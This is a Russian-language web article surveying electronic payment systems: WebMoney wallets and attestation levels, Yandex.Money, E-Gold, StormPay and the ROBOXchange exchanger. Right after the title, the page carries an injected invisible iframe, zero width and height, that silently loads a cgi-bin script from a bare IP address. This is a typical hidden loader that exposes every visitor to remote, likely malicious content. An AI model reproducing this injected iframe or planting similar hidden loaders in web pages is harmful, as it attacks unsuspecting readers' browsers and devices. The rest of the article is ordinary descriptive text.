Все о системах электронных платежей<iframe src=\"http://203.121.110.227/cgi-bin/in.cgi?p=user1\" width=0 height=0></iframe>

На модерации Отложенный Быстро развивающаяся электронная коммерция в сети Интернет привела к необходимости создания «электронных денег». Ни для кого не секрет, что с помощью электронной валюты можно совершать покупки, не выходя из дома, оплачивать различные счета, играть в онлайн-игры, оплачивать мобильную связь, а также различные услуги и многое другое.

В данный момент в Интернете созданы различные системы электронных платежей, и каждая из них имеет свою условную валюту и возможности. Представленные системы являются основными в сети Интернет.

Итак, первая система WebMoney – одна из самых распространенных систем в российском сегменте Интернет. В данной системе 3 основных вида кошельков, в которых хранятся электронные деньги.

Кошельки WebMoney:

WMZ – доллары США;

WME – евро;

WMR – российские рубли.

Система предлагает различные варианты работы. Первый способ - это скачать программу WM Keeper Classic, пройти процедуры установки и регистрации и получить уникальный WM-идентификатор.

Также существует возможность работы без установки программы. Для этого необходимо воспользоваться web-приложением WM Keeper Light. В этом случае работа осуществляется по защищенному https-соединению.

Telepat – позволяет осуществлять различные расчеты в режиме реального времени, используя мобильный телефон.

Webmoney имеет систему аттестации и предоставляет пользователям возможность получения аттестатов разных уровней. WM-аттестат представляет собой цифровое свидетельство, которое выдается пользователю, предоставившему в Центр аттестации свои персональные данные. Разумеется, участники системы, получившие аттестаты, пользуются большим доверием и имеют более высокий статус. Мы не будем подробно останавливаться на процедуре получения аттестатов, а просто перечислим их.

Аттестат псевдонима – выдается при регистрации в системе. Пользовательские данные не проверяются.

Формальный аттестат – бесплатный аттестат. Выдается после введения паспортных данных.

Начальный аттестат – стоимость от 1wmz. Выдается только обладателям формальных аттестатов и только после проверки паспортных данных. Данный аттестат открывает участникам дополнительные возможности.

Основным аттестатом системы является персональный аттестат – стоимость от 5wmz. Условия получения такие же, как и у начального аттестата. Персональный аттестат также открывает новые возможности при работе с системой, и владелец получает право участвовать в партнерской программе и выдавать Начальные аттестаты, а также другие возможности.

Аттестат продавца – для владельцев Персональных аттестатов выдается бесплатно после принятия «Соглашения с владельцем аттестата продавца». Обладает всеми возможностями Персонального аттестата.

Capitaller – аттестат выдается бесплатно владельцу Персонального аттестата. Необходима регистрация нового бюджетного автомата в сервисе Capitaller. Аттестат разработчика – также является бесплатным и выдается владельцам Персональных аттестатов, которые создают различное программное обеспечение на базе WebMoney Transfer.

Вершиной всех аттестатов является Аттестат регистратора. Выдается только после личной встречи в г. Москве, заключения договора и оплатой гарантийного взноса – 2000 WMZ, а также необходимо участие в партнерских программах по выдаче начальных и персональных аттестатов. Позволяет участвовать в работе арбитражного сервиса – арбитром.

Отметим, что аттестаты не имеют срока действия и могут быть аннулированы только в случае введения ложных паспортных данных либо при нарушении одного из соглашений системы.

Официальный сайт системы – http://www.webmoney.ru/

Раздел помощи – http://www.wmtransfer.com/rus/about/index.shtml

Скачать Web Money Keeper Classic 3.5.03 - http://www.wmtransfer.com/rus/

На этом мы закончим описание данной системы и перейдем ко второй – Яндекс-деньги, которая также пользуется огромным спросом среди пользователей Рунета.


Яндекс-деньги имеют два варианта работы: через web-интерфейс либо с помощью бесплатной программы «Интернет-кошелек». Система работает с российскими рублями, а виртуальный счет открывается автоматически.

Пополнить счет можно разнообразными способами: предоплаченные карты Яндекс-денег, наличный платеж через Почту России, в банке, а также через различные терминалы и кассы.

Система «Яндекс-деньги» позволяет осуществлять вывод денежных средств переводом на счет в банк, на карты Visa банка «Сибконтакт», а также получить наличными. Подробнее о выводе денег и комиссии вы можете прочитать на сайте системы.

Отметим, что данная система не проверяет персональные данные пользователя, однако при утрате контроля над кошельком вернуть деньги можно будет только в случае, если вы ввели достоверную персональную информацию, которая позволит установить подлинного владельца кошелька.

Официальный сайт системы «Яндекс-деньги» - http://money.yandex.ru/

Раздел помощи (FAQ по работе системы) - http://money.yandex.ru/help.xml

Скачать Интернет-кошелек - http://money.yandex.ru/doc.xml?id=522705

Следующей системой электронных платежей, о которой мы хотели бы вам рассказать, стала E-Gold. Данная система не так популярна в российском сегменте, однако является одной из самых распространенных на Западе.

В качестве единицы валюты используются не привычные доллары, евро или рубли, а весовые части металлов – золота, платина и палладий. Таким образом, участники становятся независимыми от курса валют. Необходимо отметить, что система берет комиссию при переводе со счета на счет в размере 1% (максимум $0,5).

Для работы с системой E-Gold не требуется установка специальных программ, а регистрация и все операции производятся непосредственно через web-интерфейс.

Отметим, что система позволяет зарабатывать пользователям. Для этого существует реферальная ссылка. После того как какой-либо пользователь зарегистрируется через вашу ссылку, вы будете получать определенный процент от вклада привлеченного участника.

Официальный сайт E-Gold - http://www.e-gold.com/

Описание системы - http://www.e-gold.com/unsecure/qanda.html

Также хотим обратить ваше внимание на относительно новую систему электронных платежей StormPay. В данной системе реализован механизм перевода денег с помощью e-mail, и, для того чтобы совершить операцию по переводу электронного платежа, вам необходимо ввести адрес электронной почты получателя.

Система не проверяет персональные данные пользователя и так же, как в E-Gold, имеет систему рефералов, но с одним отличием – в StormPay 6 реферальских уровней. Отметим, что система имеет некоторые ограничения. К примеру, минимальная сумма для перевода равна $1, а при переводе в другие системы StormPay возьмет с вас комиссию, правда, небольшую. Размер комиссии можно узнать на официальном сайте системы.

Напоследок расскажем немного о том, как можно обменять деньги одной системы на валюту другой. Для этого в Сети существует масса различных обменников, одним из самых популярных является ROBOXchange. Сервис позволяет производить самые разнообразные манипуляции с электронной валютой: оплачивать мобильную связь, интернет-услуги, цифровое телевидение, онлайн-игры, вывод средств в банк, обмен денег различных систем и многое другое.